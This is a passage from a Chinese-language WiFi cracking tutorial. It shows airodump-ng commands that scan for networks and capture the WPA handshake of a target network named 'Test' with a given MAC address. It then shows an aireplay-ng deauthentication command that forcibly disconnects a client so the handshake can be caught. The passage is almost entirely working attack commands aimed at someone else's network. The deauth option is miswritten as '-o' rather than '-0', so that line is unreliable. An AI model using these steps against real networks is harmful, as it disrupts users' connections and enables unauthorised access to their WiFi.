命令: airodump-ng wlan0mon
解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称
提示:找到网络之后CTRL Z结束搜索就可以
6.开始抓取握手包并保存成文件命令: airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon
解释:
1.c:信道
2.bssid:BSSID值
3.w:捕获的握手包要保存到的路径
我要破解的目标网络是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹
输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的数值都要写刚刚查到要破解的WIFI其中一个客户端的值
(1) 等待新的设备连接WIFI当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包
(2) 主动攻击命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解释:
0 :对客户端表示发起攻击,让设备断开连接
2:表示攻击次数,0表示一直攻击
a :指定无线路由器BSSID
c :指定强制断开的设备MAC
执行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包时就停止攻击